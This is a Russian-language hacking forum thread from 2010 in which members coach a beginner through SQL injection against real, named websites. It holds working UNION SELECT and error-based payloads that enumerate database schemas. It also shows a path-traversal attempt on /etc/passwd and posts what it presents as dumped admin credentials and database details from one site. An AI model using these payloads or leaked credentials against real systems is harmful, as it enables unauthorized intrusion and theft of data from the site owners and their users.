20.02.2010, 01:12
|
|
Banned
Регистрация: 14.06.2008
Сообщений: 34
С нами:
9424793
Репутация:
13
|
|
я подобрал колличество строк
http://xxxx/page.php?form_id=75%20union%20select%20+1,2,3,4,5% 20from%20pl_menu_page
теперь выяснил что существует строка под названием id
http:/xxxx/page.php?form_id=75%20union%20select%20+1,2,id,4,5 %20from%20pl_menu_page
не могу найти название остальных строк, (user,users,admin методом перебора ничего не дало) каковы мои действия дальше?
Очень хочу разобраться, help please
Последний раз редактировалось Darren; 20.02.2010 в 10:16..
|
|
|
20.02.2010, 02:55
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами:
8866466
Репутация:
564
|
|
Сообщение от Darren
Всем привет, хочу научиться скулю, ногами сильно не пинать
есть уязвимый сайт,
я подобрал колличество строк
http://zub.by/page.php?form_id=75%20union%20select%20+1,2,3,4,5% 20from%20pl_menu_page
http://zub.by/page.php?form_id=-75
Version 5.0.51a-24+lenny2+spu1
Database zubby
User zubby@localhost
OS debian-linux-gn
Tables cms_system_users
id 1
Name Администратор
Login admin
Password sa
смаотри еще таблицу pl_user_user
uname test
upassword test
|
|
|
|
20.02.2010, 02:03
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами:
8603287
Репутация:
87
|
|
Сообщение от Darren
Всем привет, хочу научиться скулю, ногами сильно не пинать
http://zub.by/page.php?form_id=-75+union+select+1,2,3,4,version%28%29+from+informa tion_schema.tables--
5.0.51a пятая версия..
http://zub.by/page.php?form_id=-75+union+select+1,2,3,4,table_name+from+informatio n_schema.tables+limit+0,1--
id = CHARACTER_SETS
http://zub.by/page.php?form_id=-75+union+select+1,2,3,4,column_name+from+informati on_schema.columns+limit+0,1--
id = CHARACTER_SET_NAME
Меняй LIMIT+1,1..2,1 итд и дойдешь до нужного столбца типа (admin,passwd,name,user итп)
Последний раз редактировалось [Feldmarschall]; 20.02.2010 в 02:08..
|
|
|
|
20.02.2010, 06:25
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
реакция на знак равенства, переменная id не попадает в SQL запрос
Код:
http://topok.com.ua/services.php?id=22/**/and/**/(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)
__________________
Карфаген должен быть разрушен...
|
|
|
|
20.02.2010, 16:09
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами:
9594385
Репутация:
386
|
|
а можно ли какнибудь обойти open_basedir при инклуде ? т.е. пытаюсь эксплуатировать багу а мне в ответ
Код:
Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(view/w.my.../../../../../etc/passwd\0.php) is not within the allowed path(s):
|
|
|
|
20.02.2010, 17:48
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от warlok
а можно ли какнибудь обойти open_basedir при инклуде ? т.е. пытаюсь эксплуатировать багу а мне в ответ
Код:
Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(view/w.my.../../../../../etc/passwd\0.php) is not within the allowed path(s):
Нет.
|
|
|
|
20.02.2010, 17:14
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
Нужна тулза, для работы со blind sql-inj, 5 ветка. причем чтоб работала по https и с куками)). пох на платформу.
зы:
Перловый гуй от Электа - под виндами требует ссл, который под актив перл не ставится изза ошибки - undef error. соответственно хз как фиксить))
Придется перечислить что пробовал:
sipt,toolza,elekt antichat mysql....
Тулза не поддерживает пока хттпс. Сипт вроде тож.
Последний раз редактировалось $n@ke; 20.02.2010 в 19:13..
|
|
|
|
20.02.2010, 18:04
|
|
Banned
Регистрация: 14.06.2008
Сообщений: 34
С нами:
9424793
Репутация:
13
|
|
Такой вопрос, допустим я нашёл таблицу в которой содержатся логин и пасс админа
http://xxx/page.php?form_id=-75+union+select+1,2,3,4,5+from+cms_system_users+li mit+0,1--
Узнать название столбца содержащее логин админа можно только перебирая названия типа admin, user,users, login, password , т.е. только методом перебора напр. так:
http://xxx/page.php?form_id=-75+union+select+1,2,3,4,admin+from+cms_system_user s+limit+0,1--
http://xxx/page.php?form_id=-75+union+select+1,2,3,4,column_name+from cms_system_users+limit+0,1--
(так тоже не выходит)
или как можно узнать названия столбцов в существующей таблице?только перебором? в факах не понял смысла, help please
|
|
|
|
20.02.2010, 18:46
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
0x{hex table} а то не поймет)) hex - это строка в шестнадцатеричном виде)
|
|
|
|
20.02.2010, 20:51
|
|
Banned
Регистрация: 14.06.2008
Сообщений: 34
С нами:
9424793
Репутация:
13
|
|
да от админки в другой таблице, главное что я смысл понял.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?1917931){kind=avatar}
Похожие темы
Комбинированный вид
